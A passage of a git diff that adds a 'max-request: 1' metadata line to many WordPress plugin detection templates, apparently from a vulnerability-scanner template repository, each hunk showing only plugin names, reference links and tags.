b/http/technologies/wordpress/plugins/loginizer.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/loginizer/ metadata: + max-request: 1 plugin_namespace: loginizer wpscan: https://wpscan.com/plugin/loginizer tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/loginpress.yaml b/http/technologies/wordpress/plugins/loginpress.yaml index 6f06b49011..1c16a72d76 100644 --- a/http/technologies/wordpress/plugins/loginpress.yaml +++ b/http/technologies/wordpress/plugins/loginpress.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/loginpress/ metadata: + max-request: 1 plugin_namespace: loginpress wpscan: https://wpscan.com/plugin/loginpress tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml index 53d409fb68..50d2e6630b 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-woocommerce.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/mailchimp-for-woocommerce/ metadata: + max-request: 1 plugin_namespace: mailchimp-for-woocommerce wpscan: https://wpscan.com/plugin/mailchimp-for-woocommerce tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml index 0e908a9580..8d71f7bde9 100644 --- a/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml +++ b/http/technologies/wordpress/plugins/mailchimp-for-wp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/mailchimp-for-wp/ metadata: + max-request: 1 plugin_namespace: mailchimp-for-wp wpscan: https://wpscan.com/plugin/mailchimp-for-wp tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/mailpoet.yaml b/http/technologies/wordpress/plugins/mailpoet.yaml index aeb1875c57..5e1f97086e 100644 --- a/http/technologies/wordpress/plugins/mailpoet.yaml +++ b/http/technologies/wordpress/plugins/mailpoet.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/mailpoet/ metadata: + max-request: 1 plugin_namespace: mailpoet wpscan: https://wpscan.com/plugin/mailpoet tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/maintenance.yaml b/http/technologies/wordpress/plugins/maintenance.yaml index 7c15702305..d87d456a8c 100644 --- a/http/technologies/wordpress/plugins/maintenance.yaml +++ b/http/technologies/wordpress/plugins/maintenance.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/maintenance/ metadata: + max-request: 1 plugin_namespace: maintenance wpscan: https://wpscan.com/plugin/maintenance tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/mainwp-child.yaml b/http/technologies/wordpress/plugins/mainwp-child.yaml index 5ce87e6c71..aa9153241e 100644 --- a/http/technologies/wordpress/plugins/mainwp-child.yaml +++ b/http/technologies/wordpress/plugins/mainwp-child.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/mainwp-child/ metadata: + max-request: 1 plugin_namespace: mainwp-child wpscan: https://wpscan.com/plugin/mainwp-child tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/malcare-security.yaml b/http/technologies/wordpress/plugins/malcare-security.yaml index c342e6b45a..09641796a3 100644 --- a/http/technologies/wordpress/plugins/malcare-security.yaml +++ b/http/technologies/wordpress/plugins/malcare-security.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/malcare-security/ metadata: + max-request: 1 plugin_namespace: malcare-security wpscan: https://wpscan.com/plugin/malcare-security tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/megamenu.yaml b/http/technologies/wordpress/plugins/megamenu.yaml index e95041f555..28b70d09bf 100644 --- a/http/technologies/wordpress/plugins/megamenu.yaml +++ b/http/technologies/wordpress/plugins/megamenu.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/megamenu/ metadata: + max-request: 1 plugin_namespace: megamenu wpscan: https://wpscan.com/plugin/megamenu tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/members.yaml b/http/technologies/wordpress/plugins/members.yaml index 879a0d1c12..b43c10ed7a 100644 --- a/http/technologies/wordpress/plugins/members.yaml +++ b/http/technologies/wordpress/plugins/members.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/members/ metadata: + max-request: 1 plugin_namespace: members wpscan: https://wpscan.com/plugin/members tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/meta-box.yaml b/http/technologies/wordpress/plugins/meta-box.yaml index 985f5d373a..eb7e78bc7f 100644 --- a/http/technologies/wordpress/plugins/meta-box.yaml +++ b/http/technologies/wordpress/plugins/meta-box.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/meta-box/ metadata: + max-request: 1 plugin_namespace: meta-box wpscan: https://wpscan.com/plugin/meta-box tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ml-slider.yaml b/http/technologies/wordpress/plugins/ml-slider.yaml index bbc305b8de..3da2ea50e1 100644 --- a/http/technologies/wordpress/plugins/ml-slider.yaml +++ b/http/technologies/wordpress/plugins/ml-slider.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ml-slider/ metadata: + max-request: 1 plugin_namespace: ml-slider wpscan: https://wpscan.com/plugin/ml-slider tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/newsletter.yaml b/http/technologies/wordpress/plugins/newsletter.yaml index 7e3e4e2d7e..7a58c58f63 100644 --- a/http/technologies/wordpress/plugins/newsletter.yaml +++ b/http/technologies/wordpress/plugins/newsletter.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/newsletter/ metadata: + max-request: 1 plugin_namespace: newsletter wpscan: https://wpscan.com/plugin/newsletter tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml index 17ea142c46..5f99b8cac8 100644 --- a/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml +++ b/http/technologies/wordpress/plugins/nextend-facebook-connect.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/nextend-facebook-connect/ metadata: + max-request: 1 plugin_namespace: nextend-facebook-connect wpscan: https://wpscan.com/plugin/nextend-facebook-connect tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/nextgen-gallery.yaml b/http/technologies/wordpress/plugins/nextgen-gallery.yaml index 953e4ab3d8..b08876df04 100644 --- a/http/technologies/wordpress/plugins/nextgen-gallery.yaml +++ b/http/technologies/wordpress/plugins/nextgen-gallery.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/nextgen-gallery/ metadata: + max-request: 1 plugin_namespace: nextgen-gallery wpscan: https://wpscan.com/plugin/nextgen-gallery tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/ninja-forms.yaml b/http/technologies/wordpress/plugins/ninja-forms.yaml index 92107fa69c..3f68dffe06 100644 --- a/http/technologies/wordpress/plugins/ninja-forms.yaml +++ b/http/technologies/wordpress/plugins/ninja-forms.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ninja-forms/ metadata: + max-request: 1 plugin_namespace: ninja-forms wpscan: https://wpscan.com/plugin/ninja-forms tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/ocean-extra.yaml b/http/technologies/wordpress/plugins/ocean-extra.yaml index 5e1fe4ef5c..34f9bde1d6 100644 --- a/http/technologies/wordpress/plugins/ocean-extra.yaml +++ b/http/technologies/wordpress/plugins/ocean-extra.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/ocean-extra/ metadata: + max-request: 1 plugin_namespace: ocean-extra wpscan: https://wpscan.com/plugin/ocean-extra tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml index 74fb3e6010..d9f645328f 100644 --- a/http/technologies/wordpress/plugins/official-facebook-pixel.yaml +++ b/http/technologies/wordpress/plugins/official-facebook-pixel.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/official-facebook-pixel/ metadata: + max-request: 1 plugin_namespace: official-facebook-pixel wpscan: https://wpscan.com/plugin/official-facebook-pixel tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/one-click-demo-import.yaml b/http/technologies/wordpress/plugins/one-click-demo-import.yaml index b9f70ba555..8a1196fc9f 100644 --- a/http/technologies/wordpress/plugins/one-click-demo-import.yaml +++ b/http/technologies/wordpress/plugins/one-click-demo-import.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/one-click-demo-import/ metadata: + max-request: 1 plugin_namespace: one-click-demo-import wpscan: https://wpscan.com/plugin/one-click-demo-import tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/optinmonster.yaml b/http/technologies/wordpress/plugins/optinmonster.yaml index 6486c02c9a..05025452b7 100644 --- a/http/technologies/wordpress/plugins/optinmonster.yaml +++ b/http/technologies/wordpress/plugins/optinmonster.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/optinmonster/ metadata: + max-request: 1 plugin_namespace: optinmonster wpscan: https://wpscan.com/plugin/optinmonster tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/otter-blocks.yaml b/http/technologies/wordpress/plugins/otter-blocks.yaml index 81f58198d3..1db1b57708 100644 --- a/http/technologies/wordpress/plugins/otter-blocks.yaml +++ b/http/technologies/wordpress/plugins/otter-blocks.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/otter-blocks/ metadata: + max-request: 1 plugin_namespace: otter-blocks wpscan: https://wpscan.com/plugin/otter-blocks tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/password-protected.yaml b/http/technologies/wordpress/plugins/password-protected.yaml index 3743307dbc..dafe6974f6 100644 --- a/http/technologies/wordpress/plugins/password-protected.yaml +++ b/http/technologies/wordpress/plugins/password-protected.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/password-protected/ metadata: + max-request: 1 plugin_namespace: password-protected wpscan: https://wpscan.com/plugin/password-protected tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/pdf-embedder.yaml b/http/technologies/wordpress/plugins/pdf-embedder.yaml index a4c6980041..ba05fb1e16 100644 --- a/http/technologies/wordpress/plugins/pdf-embedder.yaml +++ b/http/technologies/wordpress/plugins/pdf-embedder.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/pdf-embedder/ metadata: + max-request: 1 plugin_namespace: pdf-embedder wpscan: https://wpscan.com/plugin/pdf-embedder tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml index e085f30e5a..a038adac53 100644 --- a/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml +++ b/http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/pinterest-for-woocommerce/ metadata: + max-request: 1 plugin_namespace: pinterest-for-woocommerce wpscan: https://wpscan.com/plugin/pinterest-for-woocommerce tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/pixelyoursite.yaml b/http/technologies/wordpress/plugins/pixelyoursite.yaml index adf3387ddb..7f98d822a8 100644 --- a/http/technologies/wordpress/plugins/pixelyoursite.yaml +++ b/http/technologies/wordpress/plugins/pixelyoursite.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/pixelyoursite/ metadata: + max-request: 1 plugin_namespace: pixelyoursite wpscan: https://wpscan.com/plugin/pixelyoursite tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/polylang.yaml b/http/technologies/wordpress/plugins/polylang.yaml index eb6e1aaa5d..89602f4264 100644 --- a/http/technologies/wordpress/plugins/polylang.yaml +++ b/http/technologies/wordpress/plugins/polylang.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/polylang/ metadata: + max-request: 1 plugin_namespace: polylang wpscan: https://wpscan.com/plugin/polylang tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/popup-builder.yaml b/http/technologies/wordpress/plugins/popup-builder.yaml index b3c83cd0bf..2f6513ca42 100644 --- a/http/technologies/wordpress/plugins/popup-builder.yaml +++ b/http/technologies/wordpress/plugins/popup-builder.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/popup-builder/ metadata: + max-request: 1 plugin_namespace: popup-builder wpscan: https://wpscan.com/plugin/popup-builder tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/popup-maker.yaml b/http/technologies/wordpress/plugins/popup-maker.yaml index 96d8bd6aca..982306b13c 100644 --- a/http/technologies/wordpress/plugins/popup-maker.yaml +++ b/http/technologies/wordpress/plugins/popup-maker.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/popup-maker/ metadata: + max-request: 1 plugin_namespace: popup-maker wpscan: https://wpscan.com/plugin/popup-maker tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/post-smtp.yaml b/http/technologies/wordpress/plugins/post-smtp.yaml index 85955ac95e..fdcac13b56 100644 --- a/http/technologies/wordpress/plugins/post-smtp.yaml +++ b/http/technologies/wordpress/plugins/post-smtp.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/post-smtp/ metadata: + max-request: 1 plugin_namespace: post-smtp wpscan: https://wpscan.com/plugin/post-smtp tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/post-types-order.yaml b/http/technologies/wordpress/plugins/post-types-order.yaml index a81fc892ca..fc316f9f7a 100644 --- a/http/technologies/wordpress/plugins/post-types-order.yaml +++ b/http/technologies/wordpress/plugins/post-types-order.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/post-types-order/ metadata: + max-request: 1 plugin_namespace: post-types-order wpscan: https://wpscan.com/plugin/post-types-order tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml index d9c6052cd7..975b63f5de 100644 --- a/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml +++ b/http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/premium-addons-for-elementor/ metadata: + max-request: 1 plugin_namespace: premium-addons-for-elementor wpscan: https://wpscan.com/plugin/premium-addons-for-elementor tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/pretty-link.yaml b/http/technologies/wordpress/plugins/pretty-link.yaml index afc1141e0c..5065659e82 100644 --- a/http/technologies/wordpress/plugins/pretty-link.yaml +++ b/http/technologies/wordpress/plugins/pretty-link.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/pretty-link/ metadata: + max-request: 1 plugin_namespace: pretty-link wpscan: https://wpscan.com/plugin/pretty-link tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/really-simple-captcha.yaml b/http/technologies/wordpress/plugins/really-simple-captcha.yaml index d44add9ca6..732ffbc4eb 100644 --- a/http/technologies/wordpress/plugins/really-simple-captcha.yaml +++ b/http/technologies/wordpress/plugins/really-simple-captcha.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/really-simple-captcha/ metadata: + max-request: 1 plugin_namespace: really-simple-captcha wpscan: https://wpscan.com/plugin/really-simple-captcha tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/really-simple-ssl.yaml b/http/technologies/wordpress/plugins/really-simple-ssl.yaml index 20ba5c2e16..12dffeb534 100644 --- a/http/technologies/wordpress/plugins/really-simple-ssl.yaml +++ b/http/technologies/wordpress/plugins/really-simple-ssl.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/really-simple-ssl/ metadata: + max-request: 1 plugin_namespace: really-simple-ssl wpscan: https://wpscan.com/plugin/really-simple-ssl tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/redirection.yaml b/http/technologies/wordpress/plugins/redirection.yaml index cbcf3cf09d..ae0e76c4bb 100644 --- a/http/technologies/wordpress/plugins/redirection.yaml +++ b/http/technologies/wordpress/plugins/redirection.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/redirection/ metadata: + max-request: 1 plugin_namespace: redirection wpscan: https://wpscan.com/plugin/redirection tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/redux-framework.yaml b/http/technologies/wordpress/plugins/redux-framework.yaml index 3311d42c94..b1718d1ccb 100644 --- a/http/technologies/wordpress/plugins/redux-framework.yaml +++ b/http/technologies/wordpress/plugins/redux-framework.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/redux-framework/ metadata: + max-request: 1 plugin_namespace: redux-framework wpscan: https://wpscan.com/plugin/redux-framework tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml index 46c1c22805..7543ac1d55 100644 --- a/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml +++ b/http/technologies/wordpress/plugins/regenerate-thumbnails.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/regenerate-thumbnails/ metadata: + max-request: 1 plugin_namespace: regenerate-thumbnails wpscan: https://wpscan.com/plugin/regenerate-thumbnails tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/safe-svg.yaml b/http/technologies/wordpress/plugins/safe-svg.yaml index 7c13b8d2a4..4a29cecdb0 100644 --- a/http/technologies/wordpress/plugins/safe-svg.yaml +++ b/http/technologies/wordpress/plugins/safe-svg.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/safe-svg/ metadata: + max-request: 1 plugin_namespace: safe-svg wpscan: https://wpscan.com/plugin/safe-svg tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml index 53b30ba721..be281d91e6 100644 --- a/http/technologies/wordpress/plugins/seo-by-rank-math.yaml +++ b/http/technologies/wordpress/plugins/seo-by-rank-math.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/seo-by-rank-math/ metadata: + max-request: 1 plugin_namespace: seo-by-rank-math wpscan: https://wpscan.com/plugin/seo-by-rank-math tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/sg-cachepress.yaml b/http/technologies/wordpress/plugins/sg-cachepress.yaml index 9555d7aebd..6bd95ec077 100644 --- a/http/technologies/wordpress/plugins/sg-cachepress.yaml +++ b/http/technologies/wordpress/plugins/sg-cachepress.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/sg-cachepress/ metadata: + max-request: 1 plugin_namespace: sg-cachepress wpscan: https://wpscan.com/plugin/sg-cachepress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/sg-security.yaml b/http/technologies/wordpress/plugins/sg-security.yaml index 180266f448..1fd64a5279 100644 --- a/http/technologies/wordpress/plugins/sg-security.yaml +++ b/http/technologies/wordpress/plugins/sg-security.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/sg-security/ metadata: + max-request: 1 plugin_namespace: sg-security wpscan: https://wpscan.com/plugin/sg-security tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml index 17584cd064..1bb9a283ce 100644 --- a/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml +++ b/http/technologies/wordpress/plugins/shortcodes-ultimate.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/shortcodes-ultimate/ metadata: + max-request: 1 plugin_namespace: shortcodes-ultimate wpscan: https://wpscan.com/plugin/shortcodes-ultimate tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml index 015fb97043..7836d9554c 100644 --- a/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml +++ b/http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/shortpixel-image-optimiser/ metadata: + max-request: 1 plugin_namespace: shortpixel-image-optimiser wpscan: https://wpscan.com/plugin/shortpixel-image-optimiser tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml index 1d5224b457..ccd72e427a 100644 --- a/http/technologies/wordpress/plugins/simple-custom-post-order.yaml +++ b/http/technologies/wordpress/plugins/simple-custom-post-order.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/simple-custom-post-order/ metadata: + max-request: 1 plugin_namespace: simple-custom-post-order wpscan: https://wpscan.com/plugin/simple-custom-post-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/siteguard.yaml b/http/technologies/wordpress/plugins/siteguard.yaml index aafd6c6a38..3622b2c6b3 100644 --- a/http/technologies/wordpress/plugins/siteguard.yaml +++ b/http/technologies/wordpress/plugins/siteguard.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/siteguard/ metadata: + max-request: 1 plugin_namespace: siteguard wpscan: https://wpscan.com/plugin/siteguard tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/siteorigin-panels.yaml b/http/technologies/wordpress/plugins/siteorigin-panels.yaml index e10ab985da..9eff765d61 100644 --- a/http/technologies/wordpress/plugins/siteorigin-panels.yaml +++ b/http/technologies/wordpress/plugins/siteorigin-panels.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/siteorigin-panels/ metadata: + max-request: 1 plugin_namespace: siteorigin-panels wpscan: https://wpscan.com/plugin/siteorigin-panels tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/smart-slider-3.yaml b/http/technologies/wordpress/plugins/smart-slider-3.yaml index 9881b591ae..c856e1fa9e 100644 --- a/http/technologies/wordpress/plugins/smart-slider-3.yaml +++ b/http/technologies/wordpress/plugins/smart-slider-3.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/smart-slider-3/ metadata: + max-request: 1 plugin_namespace: smart-slider-3 wpscan: https://wpscan.com/plugin/smart-slider-3 tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml index 0480b4b0e6..008440cc58 100644 --- a/http/technologies/wordpress/plugins/so-widgets-bundle.yaml +++ b/http/technologies/wordpress/plugins/so-widgets-bundle.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/so-widgets-bundle/ metadata: + max-request: 1 plugin_namespace: so-widgets-bundle wpscan: https://wpscan.com/plugin/so-widgets-bundle tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml index 26d525386b..410776862f 100644 --- a/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml +++ b/http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/stops-core-theme-and-plugin-updates/ metadata: + max-request: 1 plugin_namespace: stops-core-theme-and-plugin-updates wpscan: https://wpscan.com/plugin/stops-core-theme-and-plugin-updates tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/sucuri-scanner.yaml b/http/technologies/wordpress/plugins/sucuri-scanner.yaml index 3920c5cf56..f210a2a2f9 100644 --- a/http/technologies/wordpress/plugins/sucuri-scanner.yaml +++ b/http/technologies/wordpress/plugins/sucuri-scanner.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/sucuri-scanner/ metadata: + max-request: 1 plugin_namespace: sucuri-scanner wpscan: https://wpscan.com/plugin/sucuri-scanner tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/svg-support.yaml b/http/technologies/wordpress/plugins/svg-support.yaml index f556786f5a..f1dd1bf150 100644 --- a/http/technologies/wordpress/plugins/svg-support.yaml +++ b/http/technologies/wordpress/plugins/svg-support.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/svg-support/ metadata: + max-request: 1 plugin_namespace: svg-support wpscan: https://wpscan.com/plugin/svg-support tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml index 844e3d19a0..a9ec913599 100644 --- a/http/technologies/wordpress/plugins/table-of-contents-plus.yaml +++ b/http/technologies/wordpress/plugins/table-of-contents-plus.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/table-of-contents-plus/ metadata: + max-request: 1 plugin_namespace: table-of-contents-plus wpscan: https://wpscan.com/plugin/table-of-contents-plus tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/tablepress.yaml b/http/technologies/wordpress/plugins/tablepress.yaml index eb0f02f602..d38aeb0279 100644 --- a/http/technologies/wordpress/plugins/tablepress.yaml +++ b/http/technologies/wordpress/plugins/tablepress.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/tablepress/ metadata: + max-request: 1 plugin_namespace: tablepress wpscan: https://wpscan.com/plugin/tablepress tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml index 755efd53fa..07c43b9d80 100644 --- a/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml +++ b/http/technologies/wordpress/plugins/taxonomy-terms-order.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/taxonomy-terms-order/ metadata: + max-request: 1 plugin_namespace: taxonomy-terms-order wpscan: https://wpscan.com/plugin/taxonomy-terms-order tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/the-events-calendar.yaml b/http/technologies/wordpress/plugins/the-events-calendar.yaml index 0403bb4e72..83a849e11e 100644 --- a/http/technologies/wordpress/plugins/the-events-calendar.yaml +++ b/http/technologies/wordpress/plugins/the-events-calendar.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/the-events-calendar/ metadata: + max-request: 1 plugin_namespace: the-events-calendar wpscan: https://wpscan.com/plugin/the-events-calendar tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/themeisle-companion.yaml b/http/technologies/wordpress/plugins/themeisle-companion.yaml index cd2632ea05..c6100637d9 100644 --- a/http/technologies/wordpress/plugins/themeisle-companion.yaml +++ b/http/technologies/wordpress/plugins/themeisle-companion.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/themeisle-companion/ metadata: + max-request: 1 plugin_namespace: themeisle-companion wpscan: https://wpscan.com/plugin/themeisle-companion tags: tech,wordpress,wp-plugin,top-200 diff --git a/http/technologies/wordpress/plugins/tinymce-advanced.yaml b/http/technologies/wordpress/plugins/tinymce-advanced.yaml index b5f8b822c7..1f188b66c6 100644 --- a/http/technologies/wordpress/plugins/tinymce-advanced.yaml +++ b/http/technologies/wordpress/plugins/tinymce-advanced.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/tinymce-advanced/ metadata: + max-request: 1 plugin_namespace: tinymce-advanced wpscan: https://wpscan.com/plugin/tinymce-advanced tags: tech,wordpress,wp-plugin,top-100,top-200 diff --git a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml index 85aaf7ff16..2c7b16cb44 100644 --- a/http/technologies/wordpress/plugins/translatepress-multilingual.yaml +++ b/http/technologies/wordpress/plugins/translatepress-multilingual.yaml @@ -7,6 +7,7 @@ info: reference: - https://wordpress.org/plugins/translatepress-multilingual/ metadata: + max-request: 1 plugin_namespace: translatepress-multilingual wpscan: https://wpscan.com/plugin/translatepress-multilingual tags: tech,wordpress,wp-plugin,top-200 diff --git 